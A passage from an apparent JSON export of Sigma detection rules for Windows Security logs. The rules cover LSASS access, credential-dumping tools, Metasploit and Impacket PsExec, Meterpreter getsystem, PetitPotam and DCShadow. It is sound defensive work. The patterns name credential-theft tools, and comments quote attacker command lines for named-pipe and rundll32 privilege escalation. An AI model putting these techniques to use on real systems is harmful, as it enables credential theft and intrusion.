attack.credential-access\n    - attack.t1557.003\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: security\n    definition: |\n      By default these events are not logged by default for MicrosoftDNS objects in Active Directory.\n      To enable detection, configure an AuditRule on the DNS object container with the \"CreateChild\" permission for the \"Everyone\" principal.\n      This can be accomplished using tools such as Set-AuditRule (see https://github.com/OTRF/Set-AuditRule).\ndetection:\n    selection_directory_service_changes:\n        EventID:\n            - 5136\n            - 5137\n        ObjectClass: 'dnsNode'\n        ObjectDN|contains|all: # ObjectDN\">DC=foo-11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=domain.com,CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com</Data>\n            - 'UWhRCA'\n            - 'BAAAA'\n            - 'CN=MicrosoftDNS'\n    selection_directory_service_access:\n        EventID: 4662\n        AdditionalInfo|contains|all: # AdditionalInfo\">DC=foo-11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=domain.com,CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com</Data>\n            - 'UWhRCA'\n            - 'BAAAA'\n            - 'CN=MicrosoftDNS'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_lm_namedpipe.yml",
    "content": "title: First Time Seen Remote Named Pipe\nid: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad\nstatus: test\ndescription: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes\nreferences:\n    - https://twitter.com/menasec1/status/1104489274387451904\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2023-03-14\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection1:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n    false_positives:\n        RelativeTargetName:\n            - 'atsvc'\n            - 'samr'\n            - 'lsarpc'\n            - 'lsass'\n            - 'winreg'\n            - 'netlogon'\n            - 'srvsvc'\n            - 'protected_storage'\n            - 'wkssvc'\n            - 'browser'\n            - 'netdfs'\n            - 'svcctl'\n            - 'spoolss'\n            - 'ntsvcs'\n            - 'LSM_API_service'\n            - 'HydraLsPipe'\n            - 'TermSrv_API_service'\n            - 'MsFteWds'\n            - 'sql\\query'\n            - 'eventlog'\n    condition: selection1 and not false_positives\nfalsepositives:\n    - Update the excluded named pipe to filter out any newly observed legit named pipe\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml",
    "content": "title: LSASS Access From Non System Account\nid: 962fe167-e48d-4fd6-9974-11e5b9a5d6d1\nstatus: test\ndescription: Detects potential mimikatz-like tools accessing LSASS from non system account\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-06-20\nmodified: 2023-12-11\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4663\n            - 4656\n        AccessMask:\n            - '0x100000'\n            - '0x1010'    # car.2019-04-004\n            - '0x1400'\n            - '0x1410'    # car.2019-04-004\n            - '0x1418'    # car.2019-04-004\n            - '0x1438'    # car.2019-04-004\n            - '0x143a'    # car.2019-04-004\n            - '0x1f0fff'\n            - '0x1f1fff'\n            - '0x1f2fff'\n            - '0x1f3fff'\n            - '0x40'\n            - '143a'    # car.2019-04-004\n            - '1f0fff'\n            - '1f1fff'\n            - '1f2fff'\n            - '1f3fff'\n            # - '0x1000'  # minimum access requirements to query basic info from service\n        ObjectType: 'Process'\n        ObjectName|endswith: '\\lsass.exe'\n    filter_main_service_account:\n        SubjectUserName|endswith: '$'\n    filter_main_generic:\n        ProcessName|contains:\n            # Legitimate AV and EDR solutions\n            - ':\\Program Files\\'\n            - ':\\Program Files (x86)\\'\n    filter_main_wmiprvse:\n        ProcessName: 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n        AccessMask: '0x1410'\n    filter_optional_steam:\n        ProcessName|contains: '\\SteamLibrary\\steamapps\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_mal_creddumper.yml",
    "content": "title: Credential Dumping Tools Service Execution - Security\nid: f0d1feba-4344-4ca9-8121-a6c97bd6df52\nrelated:\n    - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed\n      type: derived\nstatus: test\ndescription: Detects well-known credential dumping tools execution via service execution events\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2017-03-05\nmodified: 2022-11-29\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - attack.t1003.006\n    - attack.t1569.002\n    - attack.s0005\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains:\n            - 'cachedump'\n            - 'dumpsvc'\n            - 'fgexec'\n            - 'gsecdump'\n            - 'mimidrv'\n            - 'pwdump'\n            - 'servpw'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using credential dumping tool for password recovery\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_mal_wceaux_dll.yml",
    "content": "title: WCE wceaux.dll Access\nid: 1de68c67-af5c-4097-9c85-fe5578e09e67\nstatus: test\ndescription: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017-06-14\nmodified: 2025-01-30\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.s0005\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ObjectName|endswith: '\\wceaux.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_metasploit_authentication.yml",
    "content": "title: Metasploit SMB Authentication\nid: 72124974-a68b-4366-b990-d30e0b2a190d\nstatus: test\ndescription: Alerts on Metasploit host's authentications on the domain.\nreferences:\n    - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb\nauthor: Chakib Gzenayi (@Chak092), Hosni Mribah\ndate: 2020-05-06\nmodified: 2024-01-25\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID:\n            - 4625\n            - 4624\n        LogonType: 3\n        AuthenticationPackageName: 'NTLM'\n        WorkstationName|re: '^[A-Za-z0-9]{16}$'\n    selection2:\n        EventID: 4776\n        Workstation|re: '^[A-Za-z0-9]{16}$'\n    condition: 1 of selection*\nfalsepositives:\n    - Linux hostnames composed of 16 characters.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml",
    "content": "title: Metasploit Or Impacket Service Installation Via SMB PsExec\nid: 6fb63b40-e02a-403e-9ffd-3bcc1d749442\nrelated:\n    - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0\n      type: derived\nstatus: test\ndescription: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation\nreferences:\n    - https://bczyz1.github.io/2021/01/30/psexec.html\nauthor: Bartlomiej Czyz, Relativity\ndate: 2021-01-21\nmodified: 2022-10-05\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1570\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|re: '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$'\n        ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)'\n        ServiceStartType: 3  # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697\n        ServiceType: '0x10'\n    filter:\n        ServiceName: 'PSEXESVC'\n    condition: selection and not filter\nfalsepositives:\n    - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml",
    "content": "title: Meterpreter or Cobalt Strike Getsystem Service Installation - Security\nid: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34\nrelated:\n    - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6\n      type: derived\nstatus: test\ndescription: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nauthor: Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)\ndate: 2019-10-26\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.001\n    - attack.t1134.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection_eid:\n        EventID: 4697\n    selection_cli_cmd:\n        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        ServiceFileName|contains|all:\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        ServiceFileName|contains:\n            - 'cmd'\n            - '%COMSPEC%'\n    selection_cli_rundll:\n        # meterpreter getsystem technique 2: rundll32.exe C:\\Users\\test\\AppData\\Local\\Temp\\tmexsn.dll,a /p:tmexsn\n        ServiceFileName|contains|all:\n            - 'rundll32'\n            - '.dll,a'\n            - '/p:'\n    selection_cli_share:\n        ServiceFileName|startswith: '\\\\\\\\127.0.0.1\\\\ADMIN$\\'  # https://twitter.com/svch0st/status/1413688851877416960?lang=en\n    condition: selection_eid and 1 of selection_cli_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml",
    "content": "title: NetNTLM Downgrade Attack\nid: d3abac66-f11c-4ed0-8acb-50cc29c97eed\nrelated:\n    - id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2\n      type: derived\nstatus: test\ndescription: Detects NetNTLM downgrade attack\nreferences:\n    - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks\nauthor: Florian Roth (Nextron Systems), wagga\ndate: 2018-03-20\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1112\n# Windows Security Eventlog: Process Creation with Full Command Line\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Object Access > Audit Registry (Success)'\ndetection:\n    selection:\n        EventID: 4657\n        ObjectName|contains|all:\n            - '\\REGISTRY\\MACHINE\\SYSTEM'\n            - 'ControlSet'\n            - '\\Control\\Lsa'\n        ObjectValueName:\n            - 'LmCompatibilityLevel'\n            - 'NtlmMinClientSec'\n            - 'RestrictSendingNTLMTraffic'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml",
    "content": "title: Windows Network Access Suspicious desktop.ini Action\nid: 35bc7e28-ee6b-492f-ab04-da58fcf6402e\nstatus: test\ndescription: Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.\nreferences:\n    - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/\nauthor: Tim Shelton (HAWK.IO)\ndate: 2021-12-06\nmodified: 2022-01-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.009\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ObjectType: File\n        RelativeTargetName|endswith: '\\desktop.ini'\n        AccessList|contains:\n            - 'WriteData'\n            - 'DELETE'\n            - 'WriteDAC'\n            - 'AppendData'\n            - 'AddSubdirectory'\n    condition: selection\nfalsepositives:\n    - Read only access list authority\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml",
    "content": "title: New or Renamed User Account with '$' Character\nid: cfeed607-6aa4-4bbd-9627-b637deb723c8\nstatus: test\ndescription: |\n    Detects the creation of a user with the \"$\" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.\nreferences:\n    - https://twitter.com/SBousseaden/status/1387743867663958021\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-25\nmodified: 2024-01-16\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_create:\n        EventID: 4720 # create user\n        SamAccountName|contains: '$'\n    selection_rename:\n        EventID: 4781 # rename user\n        NewTargetUserName|contains: '$'\n    filter_main_homegroup:\n        EventID: 4720\n        TargetUserName: 'HomeGroupUser$'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml",
    "content": "title: Denied Access To Remote Desktop\nid: 8e5c03fa-b7f0-11ea-b242-07e0576828d9\nstatus: test\ndescription: |\n  This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\n  Often, this event can be generated by attackers when searching for available windows servers in the network.\nreferences:\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825\nauthor: Pushkarev Dmitry\ndate: 2020-06-27\nmodified: 2021-11-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4825\n    condition: selection\nfalsepositives:\n    - Valid user was not added to RDP group\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_password_policy_enumerated.yml",
    "content": "title: Password Policy Enumerated\nid: 12ba6a38-adb3-4d6b-91ba-a7fb248e3199\nstatus: test\ndescription: Detects when the password policy is enumerated.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661\n    - https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951\nauthor: Zach Mathis\ndate: 2023-05-19\ntags:\n    - attack.discovery\n    - attack.t1201\nlogsource:\n    product: windows\n    service: security\n    definition: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64\ndetection:\n    selection:\n        EventID: 4661 # A handle to an object was requested.\n        AccessList|contains: '%%5392' # ReadPasswordParameters\n        ObjectServer: 'Security Account Manager'\n    condition: selection\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_pcap_drivers.yml",
    "content": "title: Windows Pcap Drivers\nid: 7b687634-ab20-11ea-bb37-0242ac130002\nstatus: test\ndescription: Detects Windows Pcap driver installation based on a list of associated .sys files.\nreferences:\n    - https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more\nauthor: Cian Heasley\ndate: 2020-06-10\nmodified: 2023-04-14\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains:\n            - 'pcap'\n            - 'npcap'\n            - 'npf'\n            - 'nm3'\n            - 'ndiscap'\n            - 'nmnt'\n            - 'windivert'\n            - 'USBPcap'\n            - 'pktmon'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_petitpotam_network_share.yml",
    "content": "title: Possible PetitPotam Coerce Authentication Attempt\nid: 1ce8c8a3-2723-48ed-8246-906ac91061a6\nstatus: test\ndescription: Detect PetitPotam coerced authentication activity.\nreferences:\n    - https://github.com/topotam/PetitPotam\n    - https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml\nauthor: Mauricio Velazco, Michael Haag\ndate: 2021-09-02\nmodified: 2022-08-11\ntags:\n    - attack.credential-access\n    - attack.t1187\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5145\n        ShareName|startswith: '\\\\\\\\' # looking for the string \\\\somethink\\IPC$\n        ShareName|endswith: '\\IPC$'\n        RelativeTargetName: lsarpc\n        SubjectUserName: ANONYMOUS LOGON\n    condition: selection\nfalsepositives:\n    - Unknown. Feedback welcomed.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml",
    "content": "title: PetitPotam Suspicious Kerberos TGT Request\nid: 6a53d871-682d-40b6-83e0-b7c1a6c4e3a5\nstatus: test\ndescription: |\n    Detect suspicious Kerberos TGT requests.\n    Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\n    One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\n    This request will generate a 4768 event with some unusual fields depending on the environment.\n    This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\nreferences:\n    - https://github.com/topotam/PetitPotam\n    - https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/\n    - https://github.com/splunk/security_content/blob/88d689fe8a055d8284337b9fad5d9152b42043db/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml\nauthor: Mauricio Velazco, Michael Haag\ndate: 2021-09-02\nmodified: 2022-10-05\ntags:\n    - attack.credential-access\n    - attack.t1187\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Account Logon > Kerberos Authentication Service\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 4768\n        TargetUserName|endswith: '$'\n        CertThumbprint|contains: '*'\n    filter_local:\n        IpAddress: '::1'\n    filter_thumbprint:\n        CertThumbprint: ''\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_possible_dc_shadow.yml",
    "content": "title: Possible DC Shadow Attack\nid: 32e19d25-4aed-4860-a55a-be99cb0bf7ed\nrelated:\n    - id: 611eab06-a145-4dfa-a295-3ccc5c20f59a\n      type: derived\nstatus: test\ndescription: Detects DCShadow via create new SPN\nreferences:\n    - https://twitter.com/gentilkiwi/status/1003236624925413376\n    - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2\n    - https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48\nauthor: Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah\ndate: 2019-10-25\nmodified: 2022-10-17\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1207\nlogsource:\n    product: windows\n    service: security\n    definition: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule)\ndetection:\n    selection1:\n        EventID: 4742\n        ServicePrincipalNames|contains: 'GC/'\n    selection2:\n        EventID: 5136\n        AttributeLDAPDisplayName: servicePrincipalName\n        AttributeValue|startswith: 'GC/'\n    condition: 1 of selection*\nfalsepositives:\n    - Valid on domain controllers; exclude known DCs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml",
    "content": "title: PowerShell Scripts Installed as Services - Security\nid: 2a926e6a-4b81-4011-8a96-e36cc8c04302\nrelated:\n    - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae\n      type: derived\nstatus: test\ndescription: Detects powershell script installed as a Service\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2022-11-29\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceFileName|contains:\n            - 'powershell'\n            - 'pwsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_protected_storage_service_access.yml",
    "content": "title: Protected Storage Service Access\nid: 45545954-4016-43c6-855e-eae8f1c369dc\nstatus: test\ndescription: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-10\nmodified: 2021-11-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ShareName|contains: 'IPC'\n        RelativeTargetName: 'protected_storage'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml",
    "content": "title: RDP over Reverse SSH Tunnel WFP\nid: 5bed80b6-b3e8-428e-a3ae-d3c757589e41\nstatus: test\ndescription: Detects svchost hosting RDP termsvcs communicating with the loopback address\nreferences:\n    - https://twitter.com/SBousseaden/status/1096148422984384514\n    - https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx\nauthor: Samir Bousseaden\ndate: 2019-02-16\nmodified: 2022-09-02\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.lateral-movement\n    - attack.t1090.001\n    - attack.t1090.002\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5156\n    sourceRDP:\n        SourcePort: 3389\n        DestAddress:\n            - '127.*'\n            - '::1'\n    destinationRDP:\n        DestPort: 3389\n        SourceAddress:\n            - '127.*'\n            - '::1'\n    filter_app_container:\n        FilterOrigin: 'AppContainer Loopback'\n    filter_thor:  # checking BlueKeep vulnerability\n        Application|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    condition: selection and ( sourceRDP or destinationRDP ) and not 1 of filter*\nfalsepositives:\n    - Programs that connect locally to the RDP port\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml",
    "content": "title: Register new Logon Process by Rubeus\nid: 12e6d621-194f-4f59-90cc-1959e21e69f7\nstatus: test\ndescription: Detects potential use of Rubeus via registered new trusted logon process\nreferences:\n    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\nauthor: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community\ndate: 2019-10-24\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4611\n        LogonProcessName: 'User32LogonProcesss'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_registry_permissions_weakness_check.yml",
    "content": "title: Service Registry Key Read Access Request\nid: 11d00fff-5dc3-428c-8184-801f292faec0\nstatus: test\ndescription: |\n    Detects \"read access\" requests on the services registry key.\n    Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\n    Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.\nreferences:\n    - https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness\nauthor: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team\ndate: 2023-09-28\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: SACLs must be enabled for \"READ_CONTROL\" on the registry keys used in this rule'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectName|contains|all:\n            - '\\SYSTEM\\'\n            - 'ControlSet\\Services\\'\n        AccessList|contains: '%%1538' # READ_CONTROL\n    condition: selection\nfalsepositives:\n    - Likely from legitimate applications reading their key. Requires heavy tuning\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_remote_powershell_session.yml",
    "content": "title: Remote PowerShell Sessions Network Connections (WinRM)\nid: 13acf386-b8c6-4fe0-9a6e-c4756b974698\nstatus: test\ndescription: Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-09-12\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5156\n        DestPort:\n            - 5985\n            - 5986\n        LayerRTID: 44\n    condition: selection\nfalsepositives:\n    - Legitimate use of remote PowerShell execution\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_replay_attack_detected.yml",
    "content": "title: Replay Attack Detected\nid: 5a44727c-3b85-4713-8c44-4401d5499629\nstatus: test\ndescription: Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4649\nauthor: frack113\ndate: 2022-10-14\ntags:\n    - attack.credential-access\n    - attack.t1558\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID: 4649\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml",
    "content": "title: SAM Registry Hive Handle Request\nid: f8748f2c-89dc-4d95-afb0-5a2dfdbad332\nstatus: test\ndescription: Detects handles requested to SAM registry hive\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-12\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1012\n    - attack.credential-access\n    - attack.t1552.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4656\n        ObjectType: 'Key'\n        ObjectName|endswith: '\\SAM'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_scm_database_handle_failure.yml",
    "content": "title: SCM Database Handle Failure\nid: 13addce7-47b2-4ca0-a98f-1de964d1d669\nstatus: test\ndescription: Detects non-system users failing to get a handle of the SCM database.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-12\nmodified: 2022-07-11\ntags:\n    - attack.discovery\n    - attack.t1010\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4656\n        ObjectType: 'SC_MANAGER OBJECT'\n        ObjectName: 'ServicesActive'\n        AccessMask: '0xf003f'  # is used in the reference; otherwise too many FPs\n        # Keywords: 'Audit Failure' <-> in the ref 'Keywords':-9214364837600034816\n    filter:\n        SubjectLogonId: '0x3e4'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\n# triggering on many hosts in some environments\nlevel: medium\n"
